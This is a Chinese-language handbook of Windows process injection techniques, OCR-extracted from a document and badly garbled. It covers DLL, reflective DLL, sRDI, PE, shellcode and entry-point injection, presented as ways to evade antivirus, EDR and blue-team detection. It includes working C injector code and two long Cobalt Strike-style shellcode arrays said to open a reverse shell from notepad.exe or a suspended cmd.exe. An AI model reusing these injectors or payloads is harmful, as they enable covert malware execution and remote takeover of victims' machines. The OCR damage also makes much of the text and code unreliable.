2024进程注入技术手册.docx

进程注入技术手册目录D1.1.注入经典D1.1.注入注入方法例子反射D1.1.注实现方法例子SheIleOde反射D1.1.注入(sRDl)PE注入在远程进程中执行Shellcode没有VirtUalAIIOCEXRWX的AddreSSOfEntryPOint代码注入注入方法DemoPROCESSHO1.1.OWING(RunPE)注入方法ProcessDoppelganging注入方法线程执行劫持注入方法完整DnIeO例子从PE资源加教和执行Shellcode注入方法DemoAPC队列代码注入注入方法DemoAPC队列代码注入变种SetWindowHookEx注入DemoNtCreateSection+NtMapViewfSection代码注入注入方法DemoModuleStomping注入方法DenIo案例分享后记进程注入是一种常用来绕过总端安全软件和蓝队排查的手法,在无文件落地和恶意软件攻击中的都是常用的手法。在另一个进程的地址空间内运行自定义代码。进程注入提高了隐身性,一些技术还实现了持久性。D1.1.注入经典D1.1.注入通过创建者远程线程和加载库的D1.1.注入是把ShHICOde注入另一个进程的常用技术在攻击中我们可以将其恶意动态链接库(D1.1.)的路径写入另一个进程的虚拟地址空间中，并通过在目标进程中创建远程线程来确保远程进程加载它。D1.1.注入是将代码注入至卜个远程进程中,并让远程进程调用1.oad1.ibrary()函数从而强制远程进程加载一个D1.1.程序到进程中。而当D1.1.被加载时就会运行D1.1.中的DllMain()函数,所以就会为代码执行提供机会,而因为D1.1.本身是由感染后的进程加载的同时PE文件也并没有对系统进行过多的敏感操作所以这种技术具有相当强的一种隐蔽性。C1.ASSICD1.1.INJECTIONTARGETPROCESSMA1.WAREPROCESSSinwinouc<2-DISKSPACEENDGAME.注入方法1.指定一个目标进程,例如SVChoSt.exe。常用方法：CreateToolhelp32Snapshot是用于枚举指定进程或所有进程的堆或模块状态的APl，它返回-个快照一PrOCeSS32FirSt检索有关快照中第一个进程的信息然后在循环中使用ProCeSS32NeXt遍历它们找到目标进程后,通过调用OPenProCeSS获取目标进程的句柄例子intmain(itargc,char*argv)HAND1.EprocessHadle;PVOIDremoteBuffer;wcharjdllPath=TEXT(',Cevilm64.dl);printf(',lnjectingD1.1.toPID:%in",atoi(argv1);ProcessHandIe=OpenProcess(PROCESS_A1.1._ACCESS,FA1.SE,DWORD(atoi(argv1);remoteBuffer=VirtualAllocEx(processHandle,NU1.1.,sizeofdllPath,MEM_COMMIT,PAGE_READWRITE);WriteProcessMemory(processHandle,remoteBuffer,(1.PVOID)dllPath,SizeofdIIPath,NU1.1.);PTHREAD_START_ROUTINEthreatStartRoutineAddress=(PTHREAD-START-ROTINE)GetProcAddress(GetModuleHandle(TEXT(',Kernel32,')j"1.oad1.ibraryW");CreateRemoteThread(processHandle,NU1.1.,O,threatStartRoutineAddress,remoteBuffer,O,NU1.1.);CloseHandIe(ProcessHandIe);returnO;反射D1.1.注入反射D1.1.注入是一种库注入技术,其中采用反射编程的概念来将库从内存加载到主机进程中常规的D1.1.注入方式相信大家都很熟悉了，禾睨CreateRemOteThread这一函数在目标进程中开始一个新的线程，这个线程执行系统的APl函数1.Oad1.ibrary,之后D1.1.就被装载到目标进程中了。常规的注入方式太过于套路化(CreateRemOteThread+1.oad1.ibrary)导致它十分容易被检测出来。同时常规的D1.1.注入方式还需要目标D1.1.必须存在磁盘上,而文件一旦落地就也存在着被杀毒软件查杀的险。实现方法要实现反射式注入D1.1.我们需要两个部分，注射器和被注入的D1.1.。其中，被注入的D1.1.除了需要导出一个函数RefleCtiVe1.oader来实现对自身的加载之外其余部分可以正常编写源代码以及编译。而注射器部分只需要将被注入的D1.1.文件写入到目标进程,然后将控制权转交给这个RefieCtiVe1.Oader即可。1 .使用RWX权限打开目标进程并为D1.1.分配足够大的内存2 .将D1.1.复制到分配的内存空间中3 .计算D1.1.内的内存偏移量到用于进行反射加载的导出4,使用反射加载器函数的偏移地址作为人口点，调用CreateRemoteThread（或等效的未记录的APl函数,如RtcreateUSerThread）以在远程进程中开始执行5,反射加载器函数使用适当的CPU寄存器查找目标进程的进程环境块（PEB）并使用它来查找内存kernel32.dll和任何其他所需库的地址6 .解析kernel32的exports目录，找至U需要的APl函数如1.oad1.ibraryAGetPrOCAddreSS的内存地址VirtUalAilOC7 .然后使用这些函数将D1.1.（本身）正确加载到内存中并调用其人口点DIIMain更多技术细节：https:/www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injectionblogs.eom/lsgxeva/p/12923419.html例子把D1.1.注入指定进程弹出MeSSageBoXRcmmutl>ivalwMr*N!M.11hM>ln4ta如果要加载ShelICOd6在dll中定义就行POC:WOTWWOWS!MeCMyMMSUrtoeUaR2nVll11>WMMCRMMShellCode反射D1.1.注入(sRDI)Shellcode反射D1.1.注入(sRDI)是一种技术,它允许将给定的D1.1.转换为位置无关的shellcode，然后可以使用任意ShelICode注入和执行技术注入该ShelICod&相对于标准RDI使用SRDI的一些优点：可以转换任何D1.1.为无位置依赖的ShelICode并且可以使用标准的ShellCode注入技术来使用它。1.1.中不需要写任何反射加载器代码,因为反射加载器是在D1.1.外部的ShellCOde中实现的。合理使用权限，没有大量的RWX权限数据。还可以根据选项,抹掉PE头特征。SRDl的所有功能基于以下两个组件：-个C语言项目,可将PE1.oader编译为Shellcode转换代码负责将D1.1.、RDI和用户数据进行绑定由以下文件组成：SheIIcodeRDI：编译D1.1.加载器的ShellcodeNative1.oader:需要时,将D1.1.转换为shellcode然后注入内存DotNet1.oader：Native1.oader的C#实现pythonConvertToSheIIcode.Py:将D1.1.转换为shellcodePythonEncodeBIobs.py：对已编译的SRDI进行编码,进行静态嵌入PowerSheIIConvertTo-Shellcode.ps!:将D1.1.转换为ShellCodeFunctionTest:导入sRDI的C函数进行调试测试TestD1.1.:示例D1.1.,包括两个导出函数,用于后续的加载和调用D1.1.不需要使用RDI进行编译,但是该技术具有交叉兼容性。POWerShelI导入194PSC:Uers111eDesktop½fiASM)XjA%R0I-masterslU)I-MaiterPcwerSe1)>Import-Module.COnvertTo-Shel!code.pla编写D1.1.DemoCrmtvFroeMiA(N1.1,'<)*ftot*pd.et<*MIX,SIUVTBl40.UaaMIX.i.a);*tcIulr*nn.trrail)caseQ1.1.PffXXSSAnACH:liessae8oxACHIX4vD1.Dbin!*.*le'etartd.*0);CreatePlrocesaA(SI1.1.*(1.PSTR>*Bot<>d.eeMU_M_1.1.TRIE0.MUwMI1.,ivpi);br:CMeBUnMAlMTTAaI:CM*Otln*EDDT!:caseB1.1.PfOOSSDCTACM:break;CamwrtTo-SkwIl<odvC:Ut<rlll<DvktapMV将D1.1.转换为shellcode.默认为一个以十进制值表示的shellcode字节数组：TC:UerUl«D9ktcJftlliAXSMITiiAMBMmtirMIImt9rF0wrrSh9ll>al(tUItDIV1RDl-Mtter0etMMTestDII«11方便后面利用,我们转化为16进制把ShelICOde保存转为C的SheIlCOdeMtav<MMr-o一三r=三三il三三三三三三1三三:T三三,三,s:一三三三三三三H,7三三总三三2三三三三=三:=H三'.H三三H三k一三三三三三-三-s.=s:»s:£I三三=三si三三三w三三三三H三M三s三三三Is'三i三三-三E三三三三三三:H三:三S然后使用其他手法加载就行。PE注入将其SheIICode复制到现有的打开进程中并使其执行（例如：调用CreateRemoteThread）.PE注入相对于1.oad1.ibrary技术的优势之一是我们不必在磁盘上放置D1.1.与D1.1.注入类似在目标进程(例如VirtUalAlloCEX)中分配内存然后使用WriteProcessMemory写入shellcodePEINJECTIONtarget:PROCESSENDGAME在远程进程中执行ShellcodeShelICe)de注入是最基本的内存攻击技术也是使用时间最的，一般步骤构成：使用C)PenProCeSS打开目标进程;使用VirtUalloCEX在目标进程中分配eXecute-Read-Write(XRW)内存；使用WriteProCeSSMemory将SheIlCC)de有效内容复制到新内存；远程进程中创建一个新的线程来执行ShellCOde(CreateRemoteThread);使用VirtUaIFreeEX在目标进程中解除分配XRW内存；使用CloSeHandIe关闭目标进程句柄CObaltStrike生成ShellCOde,下面的代码将shellcode注入到一个PID为5428的notepad.exe进程中该进程将巨动一个反向shell返回给我们：#include"stdafx.h',#include"Windows.h"intmain(intargc,char*argv)unsignedcharshellcode=11xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0xbx4ax4ax4dx31xc9x48x31xc0xacx3c×61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x6Ax48×01xd0×50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xfxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1×38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66×41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8b×04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xfxe0x58x41×59x5ax48x8bx12xe9x4xfxffxfx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00×41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48×31xc9×48x31xd2x4dx31xc0x4dx31xc9x41×50x41x50x41xbax3ax56x79xaAxffxd5xe9x93x00x00x00x5ax48x89xc1x41xb8xbbx01x00x00x4d×31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx79x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x32xc0x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1xbax1fx00x00x00×6ax00x68x80x33x00x00x49x89xe0x41xb9x04x00x00x00x41xbax75x46x9ex86xfxd5x48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06×18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxb3xe9xe4x01x00x00xe8x82xffxffxffx2x62x6f×6x74x73x74x72x61x70x2dx32x2ex6dx69x6ex2ex6a×73x00x09x92x30x64xecx72xbbx55x3dxb4x67xe0x74xbdxb7x7ax97×0dxa3x83x17xb6x03x13x4cx33xc4xcbxfbxbcx26xf4x68xdex1dx5ax4cx87x33xc0x5dxd4xe5x2cxd2x2cx92x99xbax86xd4x68x67x37x57x7x10xb7xb9x00x41x63x63x65x70x74x3a×20x2ax2fx2ax0dx0ax43x6x6ex74x65x6ex74x2dx4cx61x6ex67x75x61x67x65x3ax20x64x69x76x2dx4dx56x20x44x68x69x76x65x68x69x0dx0ax55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2x35x2ex30x20x28×63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x38x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3b×20x54x72x69×64x65x6ex74x2x35x2ex30x29x0dx0ax00xb7xc9x85xc5x33×65xefx3bx8axbaxb6x46x17x6cx48x7bx12xc6xf5xacx98x9exc2×1cx42x83x50x9exafxc6xc5x55xb4x28xd5x8fxb7x55x94xeAxe9x19x66x91xbax94x6Axc1xcb×8ax3Cxfx4bxb5xbexe6xf4x28xf3x3x26x18x1x26x11x18x44x85x6dx14xc6x1fxe8xd4x2cx58x93x36xd2x8exa6xd4x8cx10x46xc7x1fxb4x17xd1x6e×54x5dxdbx87x81xbdxb1x7ax31xb4x2ax7x02xbfxdx4cx1ax6cx8fxafxbaxd6xCdx3fxb2x9fx2exe2x61x94xd2xebxex11x71x78xfex2cxb7x91xfexa7x91x3ax28xbax1dxbcx43x35x75xccx7axf2x4dx1bx16xc3xfx25x28xecx26xf8x5exf8x04x8x31x9ex59x99x62×39x27x05x75x26x84x20xcax3cx78x1cx98xa3x39x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40×00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9×41xbax12x96x89xe2xfxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58×48x05x00×00×00×00x50xc3xe8x7fxfdxffxffx63x6ex2ex61x70x69x2ex63x68x69x6ex61x64x64x2e×63x6ex00x51x09xbx6d,'HAND1.EprocessHandle;HAND1.EremoteThread;PVOIDremoteBuffer;printf("lnjectingtoPID:%i,jatoi(argv1);processHandle=OpenProcess(PROCESS_A1.1._ACCESS,FA1.SE,DWORD(atoi(argv1);remoteBuffer=VirtualAllocEx(processHandle,NU1.1.,sizeofshellcode,(MEM_RESERVEMEM_COMMIT),PAGE_EXECUTE_READWRITE);WriteProcessMemory(processHandle,remoteBuffer,shellcode,sizeofshellcode,NU1.1.);remoteThread=CreateRemoteThread(processHandle,NU1.1.,O,(1.PTHREAD_START_ROUTINE)remoteBuffer,NU1.1.,O,NU1.1.);CloseHandIe(ProcessHandIe);returnO;)没有VirtuaIAIIocExRWX的AddressOfEntryPoint代码注入EDR和杀毒软件会重点关注具有RWX的内存面“RWImwX36RW32iRW32”RW2B4iWC*SXAC:VMf*3*mVlOTDaaUcaf*oa.4kflR4k8RW4iRWMkSR三O1f11OOW)99OOfSlfVKuntyMe*ltSetv.BforWindow*Scr.rtfRyntn*MofNU.f©»Wm4wtJ.BtfWiftfi*SwsforWindowS«.>f<MWindow*Ser_."*.MvtMcclHCHClwlsrHCHCHC那么通过设置RW的权限可以防止杀毒软件和EDR重点关注。注入方法言动一个目标进程shellcode将被注入到该进程中处于挂起状态。AddreSSOfEntryPoint获取目标进程写入ShellCOde恢复目标进程Demo/#include"pch.h"#include<iostream>include<windows.h>#include<winternl.h>#pragmacomment(lib,ntdl,)intmain()(/×86shellcodeunsignedcharshellcode=11xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7×4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78×85xc0x74x4ax01xd0x50x8b×48x18x8bx58×20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24×75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xfxe0x58x5x5ax8bx12xeb×86x5d×68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5xe8x00x00x00x00x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9xa4x00x00x00x5b×31xc9x51x51x6ax03x51x51x68xbbx01x00x00x53x50x68x5Ax89x9xc6xffxd5x50xe9x8cx00x00x00x5bx31xd2x52x68x00x32xc0x84x52x52x52x53x52x50x68xebx55×2ex3bxffxd5x89xc6x83xc3×50x68x80x33x00x00x89xe0x6ax04x50x6ax1x56x68x75x46x9ex86xfxd5x5x31xfx57x5Ax6axffx53x56x68x2dx06x18×7bxffxd5x85xc0x0fx84xcax01x00x00x31xffx85xf6x74xO4x89xf9xebxO9x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x5xe0x0bxfxd5xbx00x2f×00x00x39xc7x75x07x58x50xe9x7bxffxffxffx31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x6xffxffxffx2fx7x75x65x2ex6dx69x6ex2e×6ax73x00xd4xax8ax64x1fxb8x69x90xf5xfcxbfx6cxc3xecx52xe0x11x0ex4axbdxacxf7xcaxfbx7ax49x63x07x1cxa9x9cxcb×04x17x37xafx96x11xbcxd7xebx2fxebx85x18x44x5dx91xa3x0cx7dx64x2exb7xfexccxc2x74xb8x5bxe8xdex56x55x23xd2x9dx00x41x63x63x65x70x74x3ax20x2ax2x2ax0dx0ax43x6fx6ex74x65x6ex74x2dx4cx61x6ex6x75x61x67x65x3ax20x64x69x76x2dx4dx56x20x44x68x69x76x65×68x69x0dx0ax55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6x7ax69x6cx6cx61x2x35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3b×20x4dx53x49x45x20x38x2e×30x3bx20x57x69x6ex64x6x77x73x20x4ex54x20x36x2ex31x3bx20×54x72x69x64x65x6ex74x2fx35x2ex30x29x0dx0ax00xd6xf0xe9x27xc0x94xefx1cxe5x21xfaxbcx2bx93x6cx56x30x0dx74x20x05x7cx17x66×64xb1xfcx70x71xa6x18xcbxb4xfex58x21x58xc4xf8x3fxf6x76x01x44x95x94x59x7dx0fx54x79xbbx2b×9ex2x54xe1x2Ax10x43xb2xeex79×95xacx80x9bx50xd0xa2xd9x74xa0x1dx32x55x2dx82x23x69xa1x2fx13x12x5cxe1x2bxdex32x07xa2x61×00x28x94x9bx10x8fxebxc2xe7xe1x66x11xacx1Ax73x4bx32xc0x4fx53x5bx56x99x76x9axc4xfdx14x71xcfx55xa6xe4x70x2axe0x20x57x5bxf3x63xd7xd3x1ex00x98x9dxd5x0ax28xbax5x6dx4bx04xdex8x86x1axb2x92x71x75x27x54xc4x3ax42x11xdbx1axeexb8xbdx04×50x3bx4dx0ax87xc9x18x9fxacxa1xc3x00x68xf0xb5xa2x56xffxd5xax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00×00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx0Ax01xc3x85xc0x75xe5x58xc3xe8x89xfdxffxfx63x6ex2ex61x70x69x2ex63x68x69x6ex61x64x64x2ex63x6ex00x51x09xbfx6d"Startupinfoasi；si=;ProcessjnformationPi=；PR0CESS_BASIC_INF0RMATI0Npbi=;DWORDretur1.ength=O;CreateProcessA(0,(1.PSTR)'c:windowssystem32cmd.exe',O,O,O,CREATE_SUSPENDED,O,O,&si,&pi);获取目标映像PEB地址和指向映像库的指针NtQuerylnformationProcess(pi.hProcess,ProcessBasicInformation,&pbi,sizeof(PROCESS_BASIC_INFORMATION),&return1.ength);DWORDPeboffset=(DWORD)Pbi.PebBaseAddress+8;/获取目标进程映像基址1.PVOIDimageBase=0;ReadProcessMemory(pi.hProcess,(1.PCVOID)pebOffset,&imageBase,4,NU1.1.);/读取目标进程映像头BYTEheadersBuffer4096=;ReadProcessMemory(pi.hProcess,(1.PCVOID)ImageBase,headersBuffer,4096,NU1.1.);/获取入口点的地址PIMAGE_DOS_HEADERdosHeader=(PIMAGE_DOS_HEADER)headersBuffer;PIMAGE_NT_HEADERSntHeader=(PIMAGE_NT_HEADERS)(DWORD-PTR)headersBuffer+dosHeader->eJfanew);1.PVOIDCodeEntry=(1.PVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint+(DWORD)ImageBase);将ShelICode写入图像人点并执行它WriteProcessMemory(pi.hProcess,CodeEntry,shellcode,Sizeof(SheIIcode),NU1.1.);ResumeThread(pi.hThread);returnO;)但是好像只能注入32位的进程。M911C*n11ZPf<H三11jDeSErvuner”tmWOMM*MHMMUMM4MaXMtfKMqE1.OHMA.1.oXiiPOD33SM>(VMtf4Osue*MMMyt在CObaltStrike中PROCESSHO1.1.OW